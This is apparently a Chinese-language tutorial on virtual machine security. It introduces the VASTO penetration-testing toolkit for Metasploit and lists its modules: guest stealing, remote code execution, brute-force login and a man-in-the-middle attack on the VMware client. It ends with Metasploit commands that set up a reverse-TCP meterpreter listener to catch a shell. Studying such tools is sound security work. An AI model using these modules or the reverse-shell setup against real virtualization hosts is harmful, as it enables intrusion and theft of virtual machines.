如今虛擬化在各個企業(yè)中應(yīng)用的越來越多，且火熱的云計(jì)算也依托于此技術(shù)。虛擬化技術(shù)確實(shí)能夠使物理資源的利用更加靈活和便捷，那么虛擬機(jī)的安全性如何？相比傳統(tǒng)架構(gòu)，是否像傳說中的一樣安全？

什么是虛擬化

虛擬化是指計(jì)算機(jī)元件在虛擬的基礎(chǔ)上而不是真實(shí)的基礎(chǔ)上運(yùn)行。虛擬化技術(shù)可以擴(kuò)大硬件的容量，簡化軟件的重新配置過程。CPU的虛擬化技術(shù)可以單CPU模擬多CPU并行，允許一個平臺同時(shí)運(yùn)行多個操作系統(tǒng)，并且應(yīng)用程序都可以在相互獨(dú)立的空間內(nèi)運(yùn)行而互不影響，從而顯著提高計(jì)算機(jī)的工作效率。我們先來看看虛擬機(jī)的層次結(jié)構(gòu)圖。

虛擬機(jī)完全獨(dú)立于其底層物理硬件。 例如，你可以為虛擬機(jī)配置與底層硬件上存在的物理組件完全不同的虛擬組件（例如，CPU、網(wǎng)卡、SCSI 控制器）。 同一物理服務(wù)器上的各個虛擬機(jī)甚至可以運(yùn)行不同類型的操作系統(tǒng)（Windows、Linux 等）

針對虛擬機(jī)的滲透測試

VASTO是一個專用的虛擬機(jī)滲透測試工具，支持VMware, Oracle和Xen，可以與神器Metasploit有很好的結(jié)合。使用前需要先解壓，然后復(fù)制metasploit文件夾下中

VASTO的主要模塊如下，功能還是比較強(qiáng)大的

abiquo_guest_stealer – Abiquo guest stealer

abiquo_poison – Abiquo poison

eucalyptus_bouncer – Eucalyptus Bouncer

eucalyptus_poison – Eucalyptus Poison

oraclevm_oravma_fileread – Oracle VM agent remote code execution

vmware_autopwner – VMautopwn

vmware_guest_stealer – VMware Guest Stealer

vmware_login – VMware Login check scanner

vmware_session_rider – VMware Session Rider

vmware_studio_upload – VMware Studio<2.0.0.946-172280 Remote Code Execution

vmware_updatemanager_traversal – Update manager path traversal

vmware_version – VMware products fingerprintervmware_vilurker – VIlurker VIclient attack

vmware_webaccess_portscan – VMware Web Access Relay Port Scanner

xen_login – Xen Login Check Scanner

oracle_oravma_exec – Oracle VM agent remote code execution

vmware_sfcbd_exec - VMware VAMI-sfcbd remote code exec

vmware_tomcat_killer – VMware tomcat killer

Versionsscanner Modul:

用于判斷VM的版本等信息

Login Scanner Modul:

這個模塊可以使用字典嘗試暴力登錄虛擬機(jī)

vilurker module

這個模塊原理即利用ettercap等進(jìn)行中間人攻擊，欺騙成功后，當(dāng)被攻擊者（client）訪問server時(shí)會彈出窗體，若點(diǎn)擊即反彈一個meterpreter。

先multi/handler監(jiān)聽

msf > use multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST <Local Host IP here>

msf exploit(handler) > exploit

欺騙過程如下

返回shell（meterpreter）